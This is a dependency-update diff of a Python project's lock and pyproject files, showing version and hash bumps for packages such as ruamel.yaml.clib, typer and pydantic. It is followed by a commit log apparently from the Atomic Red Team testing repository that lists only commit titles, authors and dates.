+    {file = "ruamel.yaml.clib-0.2.14-cp312-cp312-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:fb04c5650de6668b853623eceadcdb1a9f2fee381f5d7b6bc842ee7c239eeec4"},
+    {file = "ruamel.yaml.clib-0.2.14-cp312-cp312-musllinux_1_2_aarch64.whl", hash = "sha256:df3ec9959241d07bc261f4983d25a1205ff37703faf42b474f15d54d88b4f8c9"},
+    {file = "ruamel.yaml.clib-0.2.14-cp312-cp312-musllinux_1_2_i686.whl", hash = "sha256:fbc08c02e9b147a11dfcaa1ac8a83168b699863493e183f7c0c8b12850b7d259"},
+    {file = "ruamel.yaml.clib-0.2.14-cp312-cp312-musllinux_1_2_x86_64.whl", hash = "sha256:c099cafc1834d3c5dac305865d04235f7c21c167c8dd31ebc3d6bbc357e2f023"},
+    {file = "ruamel.yaml.clib-0.2.14-cp312-cp312-win32.whl", hash = "sha256:b5b0f7e294700b615a3bcf6d28b26e6da94e8eba63b079f4ec92e9ba6c0d6b54"},
+    {file = "ruamel.yaml.clib-0.2.14-cp312-cp312-win_amd64.whl", hash = "sha256:a37f40a859b503304dd740686359fcf541d6fb3ff7fc10f539af7f7150917c68"},
+    {file = "ruamel.yaml.clib-0.2.14-cp313-cp313-macosx_10_13_universal2.whl", hash = "sha256:7e4f9da7e7549946e02a6122dcad00b7c1168513acb1f8a726b1aaf504a99d32"},
+    {file = "ruamel.yaml.clib-0.2.14-cp313-cp313-macosx_15_0_arm64.whl", hash = "sha256:dd7546c851e59c06197a7c651335755e74aa383a835878ca86d2c650c07a2f85"},
+    {file = "ruamel.yaml.clib-0.2.14-cp313-cp313-manylinux2014_aarch64.whl", hash = "sha256:1c1acc3a0209ea9042cc3cfc0790edd2eddd431a2ec3f8283d081e4d5018571e"},
+    {file = "ruamel.yaml.clib-0.2.14-cp313-cp313-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:2070bf0ad1540d5c77a664de07ebcc45eebd1ddcab71a7a06f26936920692beb"},
+    {file = "ruamel.yaml.clib-0.2.14-cp313-cp313-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:9bd8fe07f49c170e09d76773fb86ad9135e0beee44f36e1576a201b0676d3d1d"},
+    {file = "ruamel.yaml.clib-0.2.14-cp313-cp313-musllinux_1_2_aarch64.whl", hash = "sha256:ff86876889ea478b1381089e55cf9e345707b312beda4986f823e1d95e8c0f59"},
+    {file = "ruamel.yaml.clib-0.2.14-cp313-cp313-musllinux_1_2_i686.whl", hash = "sha256:1f118b707eece8cf84ecbc3e3ec94d9db879d85ed608f95870d39b2d2efa5dca"},
+    {file = "ruamel.yaml.clib-0.2.14-cp313-cp313-musllinux_1_2_x86_64.whl", hash = "sha256:b30110b29484adc597df6bd92a37b90e63a8c152ca8136aad100a02f8ba6d1b6"},
+    {file = "ruamel.yaml.clib-0.2.14-cp313-cp313-win32.whl", hash = "sha256:f4e97a1cf0b7a30af9e1d9dad10a5671157b9acee790d9e26996391f49b965a2"},
+    {file = "ruamel.yaml.clib-0.2.14-cp313-cp313-win_amd64.whl", hash = "sha256:090782b5fb9d98df96509eecdbcaffd037d47389a89492320280d52f91330d78"},
+    {file = "ruamel.yaml.clib-0.2.14-cp314-cp314-macosx_10_15_universal2.whl", hash = "sha256:7df6f6e9d0e33c7b1d435defb185095386c469109de723d514142632a7b9d07f"},
+    {file = "ruamel.yaml.clib-0.2.14-cp314-cp314-macosx_15_0_arm64.whl", hash = "sha256:70eda7703b8126f5e52fcf276e6c0f40b0d314674f896fc58c47b0aef2b9ae83"},
+    {file = "ruamel.yaml.clib-0.2.14-cp314-cp314-musllinux_1_2_i686.whl", hash = "sha256:a0cb71ccc6ef9ce36eecb6272c81afdc2f565950cdcec33ae8e6cd8f7fc86f27"},
+    {file = "ruamel.yaml.clib-0.2.14-cp314-cp314-musllinux_1_2_x86_64.whl", hash = "sha256:e7cb9ad1d525d40f7d87b6df7c0ff916a66bc52cb61b66ac1b2a16d0c1b07640"},
+    {file = "ruamel.yaml.clib-0.2.14-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:18c041b28f3456ddef1f1951d4492dbebe0f8114157c1b3c981a4611c2020792"},
+    {file = "ruamel.yaml.clib-0.2.14-cp39-cp39-macosx_12_0_arm64.whl", hash = "sha256:d8354515ab62f95a07deaf7f845886cc50e2f345ceab240a3d2d09a9f7d77853"},
+    {file = "ruamel.yaml.clib-0.2.14-cp39-cp39-manylinux2014_aarch64.whl", hash = "sha256:275f938692013a3883edbd848edde6d9f26825d65c9a2eb1db8baa1adc96a05d"},
+    {file = "ruamel.yaml.clib-0.2.14-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:16a60d69f4057ad9a92f3444e2367c08490daed6428291aa16cefb445c29b0e9"},
+    {file = "ruamel.yaml.clib-0.2.14-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:5ac5ff9425d8acb8f59ac5b96bcb7fd3d272dc92d96a7c730025928ffcc88a7a"},
+    {file = "ruamel.yaml.clib-0.2.14-cp39-cp39-musllinux_1_2_aarch64.whl", hash = "sha256:e1d1735d97fd8a48473af048739379975651fab186f8a25a9f683534e6904179"},
+    {file = "ruamel.yaml.clib-0.2.14-cp39-cp39-musllinux_1_2_i686.whl", hash = "sha256:83bbd8354f6abb3fdfb922d1ed47ad8d1db3ea72b0523dac8d07cdacfe1c0fcf"},
+    {file = "ruamel.yaml.clib-0.2.14-cp39-cp39-musllinux_1_2_x86_64.whl", hash = "sha256:808c7190a0fe7ae7014c42f73897cf8e9ef14ff3aa533450e51b1e72ec5239ad"},
+    {file = "ruamel.yaml.clib-0.2.14-cp39-cp39-win32.whl", hash = "sha256:6d5472f63a31b042aadf5ed28dd3ef0523da49ac17f0463e10fda9c4a2773352"},
+    {file = "ruamel.yaml.clib-0.2.14-cp39-cp39-win_amd64.whl", hash = "sha256:8dd3c2cc49caa7a8d64b67146462aed6723a0495e44bf0aa0a2e94beaa8432f6"},
+    {file = "ruamel.yaml.clib-0.2.14.tar.gz", hash = "sha256:803f5044b13602d58ea378576dd75aa759f52116a0232608e8fdada4da33752e"},
 ]

 [[package]]
@@ -882,14 +911,14 @@ files = [

 [[package]]
 name = "typer"
-version = "0.17.3"
+version = "0.19.2"
 description = "Typer, build great CLIs. Easy to code. Based on Python type hints."
 optional = false
-python-versions = ">=3.7"
+python-versions = ">=3.8"
 groups = ["main"]
 files = [
-    {file = "typer-0.17.3-py3-none-any.whl", hash = "sha256:643919a79182ab7ac7581056d93c6a2b865b026adf2872c4d02c72758e6f095b"},
-    {file = "typer-0.17.3.tar.gz", hash = "sha256:0c600503d472bcf98d29914d4dcd67f80c24cc245395e2e00ba3603c9332e8ba"},
+    {file = "typer-0.19.2-py3-none-any.whl", hash = "sha256:755e7e19670ffad8283db353267cb81ef252f595aa6834a0d1ca9312d9326cb9"},
+    {file = "typer-0.19.2.tar.gz", hash = "sha256:9ad824308ded0ad06cc716434705f691d4ee0bfd0fb081839d2e426860e7fdca"},
 ]

 [package.dependencies]
@@ -912,14 +941,14 @@ files = [

 [[package]]
 name = "typing-inspection"
-version = "0.4.1"
+version = "0.4.2"
 description = "Runtime typing introspection tools"
 optional = false
 python-versions = ">=3.9"
 groups = ["main"]
 files = [
-    {file = "typing_inspection-0.4.1-py3-none-any.whl", hash = "sha256:389055682238f53b04f7badcb49b989835495a96700ced5dab2d8feae4b26f51"},
-    {file = "typing_inspection-0.4.1.tar.gz", hash = "sha256:6ae134cc0203c33377d43188d4064e9b357dba58cff3185f22924610e70a9d28"},
+    {file = "typing_inspection-0.4.2-py3-none-any.whl", hash = "sha256:4ed1cacbdc298c220f1bd249ed5287caa16f34d44ef4e9c3d0cbad5b521545e7"},
+    {file = "typing_inspection-0.4.2.tar.gz", hash = "sha256:ba561c48a67c5958007083d386c3295464928b01faa735ab8547c5692e87f464"},
 ]

 [package.dependencies]
@@ -946,4 +975,4 @@ zstd = ["zstandard (>=0.18.0)"]
 [metadata]
 lock-version = "2.1"
 python-versions = "^3.11"
-content-hash = "eec85177858fceb69edde53396a2468b0c9f144faf95a15de6a20141f0101475"
+content-hash = "7cca89546fe57ce2062fbfb9118dcb7e2e164d74b5f9a44227471bdc963208a8"
@@ -7,14 +7,14 @@ readme = "README.md"

 [tool.poetry.dependencies]
 python = "^3.11"
-pyyaml = "^6.0.2"
+pyyaml = "^6.0.3"
 jsonschema = "^4.25.1"
 requests = "^2.32.5"
 ruamel-yaml = "^0.18.15"
-pydantic = "^2.11.7"
-typer = "^0.17.3"
-hypothesis = "^6.138.13"
-pytest = "^8.4.1"
+pydantic = "^2.11.10"
+typer = "^0.19.2"
+hypothesis = "^6.140.2"
+pytest = "^8.4.2"


 [build-system]
Author	SHA1	Message	Date
Hare Sudhan	ee1ca4fb89	fix elevation_required	2025-10-04 14:15:01 -04:00
dependabot[bot]	90b0b774b9	Bump actions/stale from 9 to 10 (#3178 ) Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com> Co-authored-by: Hare Sudhan <code@0x6c.dev>	2025-10-04 14:10:30 -04:00
Atomic Red Team doc generator	149e41f748	Generated docs from job=generate-docs branch=master [ci skip]	2025-10-04 18:08:25 +00:00
Milad Cheraghi	b41248c790	kill all processes with Send a SIGTERM (#3173 ) Co-authored-by: Hare Sudhan <code@0x6c.dev>	2025-10-04 14:07:20 -04:00
Atomic Red Team doc generator	ee95152c22	Generated docs from job=generate-docs branch=master [ci skip]	2025-10-04 18:02:43 +00:00
ohadm-cynet	be0b138294	Update T1491.001.yaml - move dependency_executor_name to test root level (#3189 ) Co-authored-by: Hare Sudhan <code@0x6c.dev>	2025-10-04 14:01:27 -04:00
Atomic Red Team doc generator	0f41fdc8d4	Generated docs from job=generate-docs branch=master [ci skip]	2025-10-04 18:00:06 +00:00
Milad Cheraghi	c87eab6a23	disable ASLR protection via sysctl (#3192 ) Co-authored-by: Hare Sudhan <code@0x6c.dev>	2025-10-04 13:59:06 -04:00
dependabot[bot]	0fe201b898	Bump typer from 0.17.3 to 0.19.2 (#3194 ) Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> Co-authored-by: Hare Sudhan <code@0x6c.dev>	2025-10-04 13:52:09 -04:00
dependabot[bot]	b5c2b8f422	Bump pyyaml from 6.0.2 to 6.0.3 (#3195 ) Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>	2025-10-03 22:52:07 -04:00
Atomic Red Team doc generator	812ad23b22	Generated docs from job=generate-docs branch=master [ci skip]	2025-10-02 20:55:47 +00:00
wikijm	aecf7ddca9	Update T1562.001.yaml - Adding Atomic Test - Freeze PPL-protected process with EDR-Freeze (#3191 ) Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com>	2025-10-02 13:54:47 -07:00
Atomic Red Team doc generator	07affd5c64	Generated docs from job=generate-docs branch=master [ci skip]	2025-10-01 19:41:26 +00:00
Casey Hennings	eabf4e722d	T1546.008 - Atomic Test Proposal (#3183 ) Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com>	2025-10-01 12:40:19 -07:00
Atomic Red Team doc generator	a4bf8b76bd	Generated docs from job=generate-docs branch=master [ci skip]	2025-10-01 18:32:44 +00:00
Milad Cheraghi	86a5c2faa0	Identifying Network Shares - Linux (#3197 ) Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com>	2025-10-01 11:31:44 -07:00
Atomic Red Team doc generator	92bf9b4130	Generated docs from job=generate-docs branch=master [ci skip]	2025-10-01 17:22:43 +00:00
Simon Maréchal	8669f17027	fix(atomics): Fix T1562.008-8 - add region in aws CLI call (#3198 )	2025-10-01 10:21:41 -07:00